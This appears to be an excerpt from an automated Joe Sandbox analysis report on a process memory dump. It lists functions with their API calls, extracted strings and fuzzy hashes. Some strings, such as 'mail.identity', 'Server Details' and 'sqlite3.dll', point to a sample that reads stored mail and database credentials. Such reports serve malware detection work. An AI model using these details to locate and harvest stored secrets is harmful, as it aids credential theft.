                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                  • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                  Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                  • String ID:
                  • API String ID: 1886415126-0
                  • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                  • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                  • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                  • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                  Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen
                  • String ID: >$>$>
                  • API String ID: 39653677-3911187716
                  • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                  • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                  Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                  Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _strcmpi
                  • String ID: C@$mail.identity
                  • API String ID: 1439213657-721921413
                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                  Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00406640
                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                    • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                  • memcmp.MSVCRT ref: 00406672
                  • memcpy.MSVCRT ref: 00406695
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset$memcmp
                  • String ID: Ul@
                  • API String ID: 270934217-715280498
                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                  Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@
                  • String ID:
                  • API String ID: 613200358-0
                  • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                  • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                  Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                  Strings
                  • recovered %d pages from %s, xrefs: 004188B4
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                  • String ID: recovered %d pages from %s
                  • API String ID: 985450955-1623757624
                  • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                  • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                  • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                  • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                  Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _ultoasprintf
                  • String ID: %s %s %s
                  • API String ID: 432394123-3850900253
                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                  Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadMenuA.USER32(00000000), ref: 00409078
                  • sprintf.MSVCRT ref: 0040909B
                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                  • String ID: menu_%d
                  • API String ID: 1129539653-2417748251
                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                  Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • failed memory resize %u to %u bytes, xrefs: 00411706
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _msizerealloc
                  • String ID: failed memory resize %u to %u bytes
                  • API String ID: 2713192863-2134078882
                  • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                  • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                  • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                  • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                  Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                  Download Yara Rule
                  APIs
                  • _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                  • _mbscat.MSVCRT ref: 004070FA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscat$_mbscpystrlen
                  • String ID: sqlite3.dll
                  • API String ID: 1983510840-1155512374
                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                  Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString
                  • String ID: A4@$Server Details
                  • API String ID: 1096422788-4071850762
                  • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                  • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                  • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                  • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                  Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLocalmemcpymemsetstrlen
                  • String ID:
                  • API String ID: 3110682361-0
                  • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                  • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                  • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                  • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                  Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8